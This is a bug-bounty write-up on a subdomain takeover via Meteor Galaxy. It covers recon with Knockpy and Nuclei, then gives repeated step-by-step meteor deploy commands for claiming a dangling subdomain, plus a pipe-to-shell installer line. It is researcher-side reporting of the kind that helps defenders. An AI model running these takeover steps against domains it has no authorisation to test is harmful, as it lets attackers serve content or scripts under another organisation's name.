In the name of Allah
Hi guy, I’m here again, YoungVanda. In this write-up I’m gonna talk about Meteor Subdomain Takeover. From a simple recon to one of the trickiest exploitations of my life 😉
In this write-up, I explained everything from the beginning. If you just one to get to the exploitation part, check out Exploitation heading at the end.
Also if you haven’t read this write-up, give it a go. It’s a good write-up and it helped me a lot during the exploitation process.
It was a private program, with this scope: *.redacted.com
First thing I do when facing a small company/target, is just running Konckpy to get the vibe of domain. Like:
I ran Knockpy and it gave me a few subdomains I just opened them manually.
I found an interesting subdomain.
When I saw this page I said OK usually these kinda messages could be a sign of Subdomain Takeover. I’m not a big fan of Subdomain Takeover, but I said why not!!! Let’s dive into it 🔥🔥🔥
For whose don’t know what is Subdomain Takevoer
Write here ….
Back to the story, I ran Nuclei, after a second Nuclei told me, You’re a lucky boy😁 Just get out here man. Get out here.
In every Nuclei template there usually extra information about it. Even the way you can exploit the vulnerability. So here what I did to find the write-up:
cd nuclei-templates/
find . -name "template-name.yaml"
cat ./http/takeovers/template-name.yaml
So I found the write-up, the first thing I did according to the write-up was installing Meteor:
Right here…
# Other ways here: https://docs.meteor.com/install.html# I installed this way
curl https://install.meteor.com/ | sh
Next step is creating Meteor application. I used this command:
# Execute the command with a normal user, not root.
mkdir poc && cd poc
meteor create --minimal .
Note:
For creating a Meteor application you shouldn’t be root user. That was one of my problems, so to make this work I used my Amazon VPS with a ubuntu/normal user.
So far, all the required files have been created. Go and change this file
client/main.html and put your flag there:
<platform-uesrname> POC Takeover
nano client/main.html # Put your <platform-username> POC Takeover
Now, go to the www.meteor.com and sign-up. Also take note that you should put your payment details to be able use the custom subdomain feature.
meteor login # Enter your username & password
It’s time for final step.
DEPLOY_HOSTNAME=[CNAME] meteor deploy [sub.target.com]
In [CNAME] section you can put CNAME of your subdomain.
But in my case it didn’t work. You can try these:
# Didn't work for me
DEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy [sub.target.com]# Didn't work for me
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy [sub.target.com]
# Worked for me
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy [sub.target.com]
I was disappointed that I couldn’t takeover the subdomain. Even though I spent around 10 hours, in two days, to exploit the vulnerability, but I wasn’t successful. However, suddenly, I came up with an idea, but to me this was more like a shot in the dark :)
I discussed my problem on forums.meteor.com just asking for some help :)
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy travel.target.com
Finally after 2 days of exploiting and 3 days of waiting for some help. It worked !!!
Man, the moment I realised that the application is being deployed I was over the moon.
It was marvellous. Like a beautiful woman in a red dress with red lipstick
Like this woman:
Ohhh, my bed, sorry, I meant this one:
# Follow the steps with normal user, not root.
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
meteor create --minimal .
nano client/main.html # Put your <platform-username> POC Takeover
meteor login # Entering username and password - Sign-up here www.meteor.comdig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Ceck out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
It was a private RDP program so I really tried to escalate it to High/P2 by showing the scenario of Stored XSS. But it didn’t work. They closed it as Medium/P3.
Triager said this:
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
ubuntu@369:~/$ mkdir poc && cd poc
ubuntu@369:~/poc$ meteor create --minimal .
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Ceck out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Uooo man… Wait a minute, I tweet about my recent findings and some other bug bounty tips. So check out my tweeter account . Sorry X account :)
My Twitter Account: @young_vanda_